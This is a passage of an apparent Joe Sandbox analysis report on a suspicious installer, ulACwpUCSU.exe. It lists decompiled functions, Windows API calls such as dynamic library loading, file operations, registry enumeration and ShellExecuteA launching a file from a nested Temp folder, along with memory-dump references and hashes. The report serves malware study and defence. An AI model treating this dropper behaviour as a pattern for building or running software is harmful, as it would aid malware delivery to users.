                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll), ref: 0040508D
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                          • String ID:
                                          • API String ID: 2987980305-0
                                          • Opcode ID: 8405f33e14f9c3f15d0e520106e072150188c144eaeb8d7ef96d34cccaac7bda
                                          • Instruction ID: 23a464ffe6ca8440643a385a127484fd4ee8ad6b227fb7efa4d26ad3fc5b3ac3
                                          • Opcode Fuzzy Hash: 8405f33e14f9c3f15d0e520106e072150188c144eaeb8d7ef96d34cccaac7bda
                                          • Instruction Fuzzy Hash: D7210872904211BACF107FA48E49A6E39B0AB44358F60823BF601B62D1D7BC4941AA6E
                                          Function 004031E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 00405FF9
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,?,?,00000000), ref: 00406006
                                            • Part of subcall function 00405FA1: CharNextA.USER32(?,"C:\Users\user\Desktop\ulACwpUCSU.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040600B
                                            • Part of subcall function 00405FA1: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 0040601B
                                          • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 00403204
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Char$Next$CreateDirectoryPrev
                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 4115351271-1726532035
                                          • Opcode ID: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                                          • Instruction ID: 89773af62672bbf6302d30782f314b1c1bc42d6855f09756152acd8bf908297a
                                          • Opcode Fuzzy Hash: ee23c129dd8a5d49f4f649e38bc420fd14e59507522fd77197c34cef7b8656a6
                                          • Instruction Fuzzy Hash: 24D0C71290AD3066D5513B6A7C46FCF050C8F4675DF11807BF904751C58F6C555395EF
                                          Function 00406745 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa6151eb6114a7c7dde5596e7ed141339a6810161cd6e35f889c2edb9118ca88
                                          • Instruction ID: d3f30c549e8eaa155af2d8805db43d359078549a114e1d1e4cfdde4495a9482f
                                          • Opcode Fuzzy Hash: fa6151eb6114a7c7dde5596e7ed141339a6810161cd6e35f889c2edb9118ca88
                                          • Instruction Fuzzy Hash: 13A14471E00228CBDF28DFA8C8447ADBBB1FB45305F15816ED816BB281D7785A96DF44
                                          Function 00406946 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e9dede487193b96133ea94438acbc75bab27e7ac1b94d370ef06066709f64446
                                          • Instruction ID: 66af66db22d428e7cee4185570621c0262e28a8f97ef0091af547b150b1cef7f
                                          • Opcode Fuzzy Hash: e9dede487193b96133ea94438acbc75bab27e7ac1b94d370ef06066709f64446
                                          • Instruction Fuzzy Hash: 7F912170E00228CBDF28DF98C8947ADBBB1FB45305F15816ED816BB281C7786A96DF44
                                          Function 0040665C Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2d995426ddd841542114576c7cd3986778113386b5e0d0d2bb3b42046c5d03f
                                          • Instruction ID: 36158da5dd70985ab85e2c4d41886ca33cae813362c0b87a96f868d92fb05337
                                          • Opcode Fuzzy Hash: d2d995426ddd841542114576c7cd3986778113386b5e0d0d2bb3b42046c5d03f
                                          • Instruction Fuzzy Hash: 65815771D00228CFDF24CFA8C8847ADBBB1FB45305F25816AD816BB281D778A996DF15
                                          Function 00406161 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68ae08bc292ff831ddf939399879833efa26d2e617e1386947dce183f6739e75
                                          • Instruction ID: 1715bfb1c3d5716620224504c503b3d15fe2aa0a2bbcc08a305e6ffc6cb4203b
                                          • Opcode Fuzzy Hash: 68ae08bc292ff831ddf939399879833efa26d2e617e1386947dce183f6739e75
                                          • Instruction Fuzzy Hash: 53817771D00228DBDF24CFA8C8447ADBBB0FB44301F2581AED856BB281D7786A96DF45
                                          Function 004065AF Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2929f55d3e8b81ac1e584e7399a4f2facda7d772583105b5c0ec75abe6cb9a93
                                          • Instruction ID: 032b7c8430df6362c90b97cb5f8c3133674bcd2d0f853081a3cdcc23126a0f5c
                                          • Opcode Fuzzy Hash: 2929f55d3e8b81ac1e584e7399a4f2facda7d772583105b5c0ec75abe6cb9a93
                                          • Instruction Fuzzy Hash: 87711371D00228CFDF24CF98C8847ADBBB1FB48305F15806AD816BB281D7785996DF45
                                          Function 004066CD Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 948a468c2091db2feb9fa4c22586628b65dd678cc983fa395508304452d62250
                                          • Instruction ID: 3e9dbefe820a1d4baf734be7fb741bb2fb66d8e6f9ed59188b506b6c9edb630d
                                          • Opcode Fuzzy Hash: 948a468c2091db2feb9fa4c22586628b65dd678cc983fa395508304452d62250
                                          • Instruction Fuzzy Hash: AB711371E00228CBDF28CF98C884BADBBB1FB44305F15816ED816BB281D7786996DF45
                                          Function 00406619 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d63a3d575cf43ccaec2b316c623d79440d1cb8ee82c5371297a3fda91248972
                                          • Instruction ID: 1812ff5f5430a706778d8acc512246fd3c212bc7acfdfbe5d0fa3af8c8d1a12f
                                          • Opcode Fuzzy Hash: 2d63a3d575cf43ccaec2b316c623d79440d1cb8ee82c5371297a3fda91248972
                                          • Instruction Fuzzy Hash: AD712471E00228CBDF28DF98C844BADBBB1FB44305F15806ED856BB291C7786A96DF45
                                          Function 00402F1F Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                          • WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,00000004,00000004,00000000,00000000,?,?), ref: 00402FD2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: File$PointerWrite
                                          • String ID:
                                          • API String ID: 539440098-0
                                          • Opcode ID: 41928112f34441f9b3539e2a42aa88ab340ce8e3764aaba8d566e6229e32b04b
                                          • Instruction ID: 3b6e370e410e3f669d4a968ba26e16673121f6254c39c59cd6eb20204b18cf3c
                                          • Opcode Fuzzy Hash: 41928112f34441f9b3539e2a42aa88ab340ce8e3764aaba8d566e6229e32b04b
                                          • Instruction Fuzzy Hash: 14313931502259FFDF20DF55DD44A9E3BA8EF04395F20403AF908A61D0D2789A41EBA9
                                          Function 00401B11 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalFree.KERNEL32(00000000), ref: 00401B80
                                          • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree
                                          • String ID: Call
                                          • API String ID: 3394109436-1824292864
                                          • Opcode ID: 7dd1f600d39d89a74a4a0ae8e33257c148924a60196a0922c145ec90e7a93a67
                                          • Instruction ID: f4ea3dfc62e5d1cff0d3b4274299d05e9f4495bdac059fa06bbe17ad9de4a94b
                                          • Opcode Fuzzy Hash: 7dd1f600d39d89a74a4a0ae8e33257c148924a60196a0922c145ec90e7a93a67
                                          • Instruction Fuzzy Hash: 1721C072A00211ABC720EBA4CE8895E73B9EB54714724C53BF505B32D0D77CE8119F2E
                                          Function 0040218A Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040603A: FindFirstFileA.KERNELBASE(?,00421548,Invaliditetsprocent209\indoktrineringen.rec,004058F7,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0), ref: 00406045
                                            • Part of subcall function 0040603A: FindClose.KERNEL32(00000000), ref: 00406051
                                          • lstrlenA.KERNEL32 ref: 004021CA
                                          • lstrlenA.KERNEL32(00000000), ref: 004021D4
                                          • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                          • String ID:
                                          • API String ID: 1486964399-0
                                          • Opcode ID: bca2972add9fd882f8e407e235b9fbbb20ab122dffcfd5b9ae2cbf6afbd38a77
                                          • Instruction ID: 8bd3c95f8033a3e017dea1ba9a61a5da7054b4883ba983d73c0c7a27e6e6bfe8
                                          • Opcode Fuzzy Hash: bca2972add9fd882f8e407e235b9fbbb20ab122dffcfd5b9ae2cbf6afbd38a77
                                          • Instruction Fuzzy Hash: 70115671E04319AADB00FFB5894999EB7F8EF10344F10853BA505FB2D2D6BCC9019B69
                                          Function 0040243A Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402B07: RegOpenKeyExA.KERNELBASE(00000000,00000168,00000000,00000022,00000000,?,?), ref: 00402B2F
                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402468
                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 0040247B
                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Enum$CloseOpenValue
                                          • String ID:
                                          • API String ID: 167947723-0
                                          • Opcode ID: caf030312989360912e564f455c27575c802c45ca4fe6e6e3a31a613e64801eb
                                          • Instruction ID: 09a8887cd5e4729410dcfabe5c46d2a670465c21522258ca6cdcbf1033b2090e
                                          • Opcode Fuzzy Hash: caf030312989360912e564f455c27575c802c45ca4fe6e6e3a31a613e64801eb
                                          • Instruction Fuzzy Hash: E8F08671904204FFD7119F659D8CEBF7A6CEB40748F10453EF441B62C0D6B95E41966A
                                          Function 00401DD8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste,?), ref: 00401E1E
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste, xrefs: 00401E09
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste
                                          • API String ID: 587946157-994438828
                                          • Opcode ID: 40434b390c6071fab714dcb5d25e8e1443f7045445f963bbe9c0ee784e309111
                                          • Instruction ID: 92cbb6ba42742382510c3a8e41a68a30635fa0dc9ae6a59fa4a75f74f7b170a3
                                          • Opcode Fuzzy Hash: 40434b390c6071fab714dcb5d25e8e1443f7045445f963bbe9c0ee784e309111
